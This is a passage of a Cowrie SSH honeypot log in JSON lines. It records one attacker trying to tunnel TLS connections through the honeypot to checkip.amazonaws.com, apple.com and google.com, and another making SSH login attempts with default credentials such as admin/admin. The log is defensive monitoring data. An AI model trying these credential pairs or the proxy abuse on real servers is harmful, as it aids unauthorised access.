lv\\x8d\\xfe?\\t\\x94\\xab\\x9d\\xbbP\\xaf\\xb9\\xec\\xa1M\\xdd\\x8c\\x0e\\x1ax%\\xf1T\\x80\\xdc\\xad\\x8fw\\xed\\xdb\\xbc\\x00V\\x13\\x02\\x13\\x03\\x13\\x01\\xc0,\\xc00\\xc0+\\xc0/\\xcc\\xa9\\xcc\\xa8\\x00\\x9f\\x00\\x9e\\xcc\\xaa\\xc0\\xaf\\xc0\\xad\\xc0\\xae\\xc0\\xac\\xc0$\\xc0(\\xc0#\\xc0'\\xc0\\n\\xc0\\x14\\xc0\\t\\xc0\\x13\\xc0\\xa3\\xc0\\x9f\\xc0\\xa2\\xc0\\x9e\\x00k\\x00g\\x009\\x003\\x00\\x9d\\x00\\x9c\\xc0\\xa1\\xc0\\x9d\\xc0\\xa0\\xc0\\x9c\\x00=\\x00<\\x005\\x00/\\x00\\xff\\x01\\x00\\x01]\\x00\\x00\\x00\\x1a\\x00\\x18\\x00\\x00\\x15checkip.amazonaws.com\\x00\\x0b\\x00\\x04\\x03\\x00\\x01\\x02\\x00\\n\\x00\\x0c\\x00\\n\\x00\\x1d\\x00\\x17\\x00\\x1e\\x00\\x19\\x00\\x18\\x00\\x10\\x00\\x0b\\x00\\t\\x08http/1.1\\x00\\x16\\x00\\x00\\x00\\x17\\x00\\x00\\x001\\x00\\x00\\x00\\r\\x00*\\x00(\\x04\\x03\\x05\\x03\\x06\\x03\\x08\\x07\\x08\\x08\\x08\\t\\x08\\n\\x08\\x0b\\x08\\x04\\x08\\x05\\x08\\x06\\x04\\x01\\x05\\x01\\x06\\x01\\x03\\x03\\x03\\x01\\x03\\x02\\x04\\x02\\x05\\x02\\x06\\x02\\x00+\\x00\\x05\\x04\\x03\\x04\\x03\\x03\\x00-\\x00\\x02\\x01\\x01\\x003\\x00&\\x00$\\x00\\x1d\\x00 \\x1d\\xf7\\x98CnR\\xf2\\xd72\\xfc\\xa3\\xe7\\x0b\\x82_5\\x0b\\x10\\x94\\x85MY(\\xe1\\xf8\\xce-CAx%_\\x00\\x15\\x00\\xa1\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\"","sensor":"my-vps","timestamp":"2025-08-26T07:57:08.837148Z","src_ip":"212.227.235.229","session":"88e10409b527"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"23.2.65.48","dst_port":443,"src_ip":"212.227.235.229","src_port":39278,"message":"direct-tcp connection request to 23.2.65.48:443 from 127.0.0.1:39278","sensor":"my-vps","timestamp":"2025-08-26T07:57:08.942632Z","session":"88e10409b527"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"23.2.65.48","dst_port":443,"data":"b\"\\x16\\x03\\x01\\x02\\x00\\x01\\x00\\x01\\xfc\\x03\\x03\\x17\\xb0\\xd3\\xcf\\x8b\\xd7\\xa43\\x15\\xd3\\xe2\\n\\xf3\\x10\\xcf\\x8b\\xc8\\x902| \\x9f3\\x14:\\x1cc/\\xbdvl\\x05 \\x15`\\xfe\\xabST|IS?\\x8b\\xce\\x85\\xc2_\\xc7\\xdd\\xbd\\x85HP\\x13\\x0c\\x18RgOQ\\xccc\\xed\\x08\\x00V\\x13\\x02\\x13\\x03\\x13\\x01\\xc0,\\xc00\\xc0+\\xc0/\\xcc\\xa9\\xcc\\xa8\\x00\\x9f\\x00\\x9e\\xcc\\xaa\\xc0\\xaf\\xc0\\xad\\xc0\\xae\\xc0\\xac\\xc0$\\xc0(\\xc0#\\xc0'\\xc0\\n\\xc0\\x14\\xc0\\t\\xc0\\x13\\xc0\\xa3\\xc0\\x9f\\xc0\\xa2\\xc0\\x9e\\x00k\\x00g\\x009\\x003\\x00\\x9d\\x00\\x9c\\xc0\\xa1\\xc0\\x9d\\xc0\\xa0\\xc0\\x9c\\x00=\\x00<\\x005\\x00/\\x00\\xff\\x01\\x00\\x01]\\x00\\x00\\x00\\x12\\x00\\x10\\x00\\x00\\rwww.apple.com\\x00\\x0b\\x00\\x04\\x03\\x00\\x01\\x02\\x00\\n\\x00\\x0c\\x00\\n\\x00\\x1d\\x00\\x17\\x00\\x1e\\x00\\x19\\x00\\x18\\x00\\x10\\x00\\x0b\\x00\\t\\x08http/1.1\\x00\\x16\\x00\\x00\\x00\\x17\\x00\\x00\\x001\\x00\\x00\\x00\\r\\x00*\\x00(\\x04\\x03\\x05\\x03\\x06\\x03\\x08\\x07\\x08\\x08\\x08\\t\\x08\\n\\x08\\x0b\\x08\\x04\\x08\\x05\\x08\\x06\\x04\\x01\\x05\\x01\\x06\\x01\\x03\\x03\\x03\\x01\\x03\\x02\\x04\\x02\\x05\\x02\\x06\\x02\\x00+\\x00\\x05\\x04\\x03\\x04\\x03\\x03\\x00-\\x00\\x02\\x01\\x01\\x003\\x00&\\x00$\\x00\\x1d\\x00 c\\xef\\xb8\\xaeW1\\x86\\xc9\\\\+DX\\xc84I\\xa7\\xc4\\x0e\\x9a\\xabq\\x07P\\xff\\xdfM?\\xe97\\xe5bB\\x00\\x15\\x00\\xa9\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\"","id":1,"message":"discarded direct-tcp forward request 1 to 23.2.65.48:443 with data b\"\\x16\\x03\\x01\\x02\\x00\\x01\\x00\\x01\\xfc\\x03\\x03\\x17\\xb0\\xd3\\xcf\\x8b\\xd7\\xa43\\x15\\xd3\\xe2\\n\\xf3\\x10\\xcf\\x8b\\xc8\\x902| \\x9f3\\x14:\\x1cc/\\xbdvl\\x05 \\x15`\\xfe\\xabST|IS?\\x8b\\xce\\x85\\xc2_\\xc7\\xdd\\xbd\\x85HP\\x13\\x0c\\x18RgOQ\\xccc\\xed\\x08\\x00V\\x13\\x02\\x13\\x03\\x13\\x01\\xc0,\\xc00\\xc0+\\xc0/\\xcc\\xa9\\xcc\\xa8\\x00\\x9f\\x00\\x9e\\xcc\\xaa\\xc0\\xaf\\xc0\\xad\\xc0\\xae\\xc0\\xac\\xc0$\\xc0(\\xc0#\\xc0'\\xc0\\n\\xc0\\x14\\xc0\\t\\xc0\\x13\\xc0\\xa3\\xc0\\x9f\\xc0\\xa2\\xc0\\x9e\\x00k\\x00g\\x009\\x003\\x00\\x9d\\x00\\x9c\\xc0\\xa1\\xc0\\x9d\\xc0\\xa0\\xc0\\x9c\\x00=\\x00<\\x005\\x00/\\x00\\xff\\x01\\x00\\x01]\\x00\\x00\\x00\\x12\\x00\\x10\\x00\\x00\\rwww.apple.com\\x00\\x0b\\x00\\x04\\x03\\x00\\x01\\x02\\x00\\n\\x00\\x0c\\x00\\n\\x00\\x1d\\x00\\x17\\x00\\x1e\\x00\\x19\\x00\\x18\\x00\\x10\\x00\\x0b\\x00\\t\\x08http/1.1\\x00\\x16\\x00\\x00\\x00\\x17\\x00\\x00\\x001\\x00\\x00\\x00\\r\\x00*\\x00(\\x04\\x03\\x05\\x03\\x06\\x03\\x08\\x07\\x08\\x08\\x08\\t\\x08\\n\\x08\\x0b\\x08\\x04\\x08\\x05\\x08\\x06\\x04\\x01\\x05\\x01\\x06\\x01\\x03\\x03\\x03\\x01\\x03\\x02\\x04\\x02\\x05\\x02\\x06\\x02\\x00+\\x00\\x05\\x04\\x03\\x04\\x03\\x03\\x00-\\x00\\x02\\x01\\x01\\x003\\x00&\\x00$\\x00\\x1d\\x00 c\\xef\\xb8\\xaeW1\\x86\\xc9\\\\+DX\\xc84I\\xa7\\xc4\\x0e\\x9a\\xabq\\x07P\\xff\\xdfM?\\xe97\\xe5bB\\x00\\x15\\x00\\xa9\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\"","sensor":"my-vps","timestamp":"2025-08-26T07:57:09.050245Z","src_ip":"212.227.235.229","session":"88e10409b527"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"142.250.186.196","dst_port":443,"src_ip":"212.227.235.229","src_port":39412,"message":"direct-tcp connection request to 142.250.186.196:443 from 127.0.0.1:39412","sensor":"my-vps","timestamp":"2025-08-26T07:57:09.155918Z","session":"88e10409b527"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"142.250.186.196","dst_port":443,"data":"b\"\\x16\\x03\\x01\\x02\\x00\\x01\\x00\\x01\\xfc\\x03\\x03\\xa4\\xb6\\xc5\\xc7\\xce\\x92!\\xfb6_\\xef\\xda\\xb5u\\x9e\\xf2\\xc7\\nlQ\\x17C\\xae\\xbfNO\\xf6\\x96c\\x1ah\\xeb \\xf1\\x99\\x1bRa`oY\\x9c\\xc6\\xf0\\x8b\\x17\\xebZ\\xa7\\xe0-\\x94e\\x92M\\xc8\\x16\\xc7\\xe4\\xc4\\xaa\\x94\\x83\\xd39\\x00V\\x13\\x02\\x13\\x03\\x13\\x01\\xc0,\\xc00\\xc0+\\xc0/\\xcc\\xa9\\xcc\\xa8\\x00\\x9f\\x00\\x9e\\xcc\\xaa\\xc0\\xaf\\xc0\\xad\\xc0\\xae\\xc0\\xac\\xc0$\\xc0(\\xc0#\\xc0'\\xc0\\n\\xc0\\x14\\xc0\\t\\xc0\\x13\\xc0\\xa3\\xc0\\x9f\\xc0\\xa2\\xc0\\x9e\\x00k\\x00g\\x009\\x003\\x00\\x9d\\x00\\x9c\\xc0\\xa1\\xc0\\x9d\\xc0\\xa0\\xc0\\x9c\\x00=\\x00<\\x005\\x00/\\x00\\xff\\x01\\x00\\x01]\\x00\\x00\\x00\\x13\\x00\\x11\\x00\\x00\\x0ewww.google.com\\x00\\x0b\\x00\\x04\\x03\\x00\\x01\\x02\\x00\\n\\x00\\x0c\\x00\\n\\x00\\x1d\\x00\\x17\\x00\\x1e\\x00\\x19\\x00\\x18\\x00\\x10\\x00\\x0b\\x00\\t\\x08http/1.1\\x00\\x16\\x00\\x00\\x00\\x17\\x00\\x00\\x001\\x00\\x00\\x00\\r\\x00*\\x00(\\x04\\x03\\x05\\x03\\x06\\x03\\x08\\x07\\x08\\x08\\x08\\t\\x08\\n\\x08\\x0b\\x08\\x04\\x08\\x05\\x08\\x06\\x04\\x01\\x05\\x01\\x06\\x01\\x03\\x03\\x03\\x01\\x03\\x02\\x04\\x02\\x05\\x02\\x06\\x02\\x00+\\x00\\x05\\x04\\x03\\x04\\x03\\x03\\x00-\\x00\\x02\\x01\\x01\\x003\\x00&\\x00$\\x00\\x1d\\x00 b\\x08\\x0e\\x95\\\\\\x19\\x84a5$_\\xbb\\xe8\\xc3\\xb5s \\x9dF\\x8c0\\xfbcC\\xd1\\xd7\\xab\\x8f\\x8fo3}\\x00\\x15\\x00\\xa8\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\"","id":2,"message":"discarded direct-tcp forward request 2 to 142.250.186.196:443 with data b\"\\x16\\x03\\x01\\x02\\x00\\x01\\x00\\x01\\xfc\\x03\\x03\\xa4\\xb6\\xc5\\xc7\\xce\\x92!\\xfb6_\\xef\\xda\\xb5u\\x9e\\xf2\\xc7\\nlQ\\x17C\\xae\\xbfNO\\xf6\\x96c\\x1ah\\xeb \\xf1\\x99\\x1bRa`oY\\x9c\\xc6\\xf0\\x8b\\x17\\xebZ\\xa7\\xe0-\\x94e\\x92M\\xc8\\x16\\xc7\\xe4\\xc4\\xaa\\x94\\x83\\xd39\\x00V\\x13\\x02\\x13\\x03\\x13\\x01\\xc0,\\xc00\\xc0+\\xc0/\\xcc\\xa9\\xcc\\xa8\\x00\\x9f\\x00\\x9e\\xcc\\xaa\\xc0\\xaf\\xc0\\xad\\xc0\\xae\\xc0\\xac\\xc0$\\xc0(\\xc0#\\xc0'\\xc0\\n\\xc0\\x14\\xc0\\t\\xc0\\x13\\xc0\\xa3\\xc0\\x9f\\xc0\\xa2\\xc0\\x9e\\x00k\\x00g\\x009\\x003\\x00\\x9d\\x00\\x9c\\xc0\\xa1\\xc0\\x9d\\xc0\\xa0\\xc0\\x9c\\x00=\\x00<\\x005\\x00/\\x00\\xff\\x01\\x00\\x01]\\x00\\x00\\x00\\x13\\x00\\x11\\x00\\x00\\x0ewww.google.com\\x00\\x0b\\x00\\x04\\x03\\x00\\x01\\x02\\x00\\n\\x00\\x0c\\x00\\n\\x00\\x1d\\x00\\x17\\x00\\x1e\\x00\\x19\\x00\\x18\\x00\\x10\\x00\\x0b\\x00\\t\\x08http/1.1\\x00\\x16\\x00\\x00\\x00\\x17\\x00\\x00\\x001\\x00\\x00\\x00\\r\\x00*\\x00(\\x04\\x03\\x05\\x03\\x06\\x03\\x08\\x07\\x08\\x08\\x08\\t\\x08\\n\\x08\\x0b\\x08\\x04\\x08\\x05\\x08\\x06\\x04\\x01\\x05\\x01\\x06\\x01\\x03\\x03\\x03\\x01\\x03\\x02\\x04\\x02\\x05\\x02\\x06\\x02\\x00+\\x00\\x05\\x04\\x03\\x04\\x03\\x03\\x00-\\x00\\x02\\x01\\x01\\x003\\x00&\\x00$\\x00\\x1d\\x00 b\\x08\\x0e\\x95\\\\\\x19\\x84a5$_\\xbb\\xe8\\xc3\\xb5s \\x9dF\\x8c0\\xfbcC\\xd1\\xd7\\xab\\x8f\\x8fo3}\\x00\\x15\\x00\\xa8\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\"","sensor":"my-vps","timestamp":"2025-08-26T07:57:09.263208Z","src_ip":"212.227.235.229","session":"88e10409b527"}
{"eventid":"cowrie.session.closed","duration":"2.0","message":"Connection lost after 2.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T07:57:09.367732Z","src_ip":"212.227.235.229","session":"88e10409b527"}
{"eventid":"cowrie.session.connect","src_ip":"47.155.114.45","src_port":39816,"dst_ip":"1.2.3.4","dst_port":22,"session":"9cb374a13dc1","protocol":"ssh","message":"New connection: 47.155.114.45:39816 (1.2.3.4:22) [session: 9cb374a13dc1]","sensor":"my-vps","timestamp":"2025-08-26T07:57:22.003658Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T07:57:22.005047Z","src_ip":"47.155.114.45","session":"9cb374a13dc1"}
{"eventid":"cowrie.session.connect","src_ip":"47.155.114.45","src_port":40048,"dst_ip":"1.2.3.4","dst_port":22,"session":"cc71090e7aae","protocol":"ssh","message":"New connection: 47.155.114.45:40048 (1.2.3.4:22) [session: cc71090e7aae]","sensor":"my-vps","timestamp":"2025-08-26T07:57:22.170580Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-OpenSSH_10.0","message":"Remote SSH version: SSH-2.0-OpenSSH_10.0","sensor":"my-vps","timestamp":"2025-08-26T07:57:22.171456Z","src_ip":"47.155.114.45","session":"cc71090e7aae"}
{"eventid":"cowrie.client.kex","hassh":"c118de82e19e5384f50f9bfd36c1a5dc","hasshAlgorithms":"mlkem768x25519-sha256,curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha256,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr,3des-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["mlkem768x25519-sha256","curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr","3des-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: c118de82e19e5384f50f9bfd36c1a5dc","sensor":"my-vps","timestamp":"2025-08-26T07:57:22.346047Z","src_ip":"47.155.114.45","session":"cc71090e7aae"}
{"eventid":"cowrie.login.failed","username":"a","password":"a","message":"login attempt [a/a] failed","sensor":"my-vps","timestamp":"2025-08-26T07:57:22.888438Z","src_ip":"47.155.114.45","session":"cc71090e7aae"}
{"eventid":"cowrie.session.closed","duration":"1.9","message":"Connection lost after 1.9 seconds","sensor":"my-vps","timestamp":"2025-08-26T07:57:24.058806Z","src_ip":"47.155.114.45","session":"cc71090e7aae"}
{"eventid":"cowrie.session.connect","src_ip":"47.155.114.45","src_port":57164,"dst_ip":"1.2.3.4","dst_port":22,"session":"d8bf3c31fe2e","protocol":"ssh","message":"New connection: 47.155.114.45:57164 (1.2.3.4:22) [session: d8bf3c31fe2e]","sensor":"my-vps","timestamp":"2025-08-26T07:57:24.228638Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-OpenSSH_10.0","message":"Remote SSH version: SSH-2.0-OpenSSH_10.0","sensor":"my-vps","timestamp":"2025-08-26T07:57:24.230265Z","src_ip":"47.155.114.45","session":"d8bf3c31fe2e"}
{"eventid":"cowrie.client.kex","hassh":"c118de82e19e5384f50f9bfd36c1a5dc","hasshAlgorithms":"mlkem768x25519-sha256,curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha256,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr,3des-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["mlkem768x25519-sha256","curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr","3des-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: c118de82e19e5384f50f9bfd36c1a5dc","sensor":"my-vps","timestamp":"2025-08-26T07:57:24.403306Z","src_ip":"47.155.114.45","session":"d8bf3c31fe2e"}
{"eventid":"cowrie.login.failed","username":"nil","password":"","message":"login attempt [nil/] failed","sensor":"my-vps","timestamp":"2025-08-26T07:57:24.966315Z","src_ip":"47.155.114.45","session":"d8bf3c31fe2e"}
{"eventid":"cowrie.session.closed","duration":"1.9","message":"Connection lost after 1.9 seconds","sensor":"my-vps","timestamp":"2025-08-26T07:57:26.139796Z","src_ip":"47.155.114.45","session":"d8bf3c31fe2e"}
{"eventid":"cowrie.session.connect","src_ip":"47.155.114.45","src_port":59848,"dst_ip":"1.2.3.4","dst_port":22,"session":"8edc8745080e","protocol":"ssh","message":"New connection: 47.155.114.45:59848 (1.2.3.4:22) [session: 8edc8745080e]","sensor":"my-vps","timestamp":"2025-08-26T07:57:26.308550Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-OpenSSH_10.0","message":"Remote SSH version: SSH-2.0-OpenSSH_10.0","sensor":"my-vps","timestamp":"2025-08-26T07:57:26.310059Z","src_ip":"47.155.114.45","session":"8edc8745080e"}
{"eventid":"cowrie.client.kex","hassh":"c118de82e19e5384f50f9bfd36c1a5dc","hasshAlgorithms":"mlkem768x25519-sha256,curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha256,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr,3des-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["mlkem768x25519-sha256","curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr","3des-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: c118de82e19e5384f50f9bfd36c1a5dc","sensor":"my-vps","timestamp":"2025-08-26T07:57:26.480874Z","src_ip":"47.155.114.45","session":"8edc8745080e"}
{"eventid":"cowrie.login.failed","username":"admin","password":"admin","message":"login attempt [admin/admin] failed","sensor":"my-vps","timestamp":"2025-08-26T07:57:27.231388Z","src_ip":"47.155.114.45","session":"8edc8745080e"}
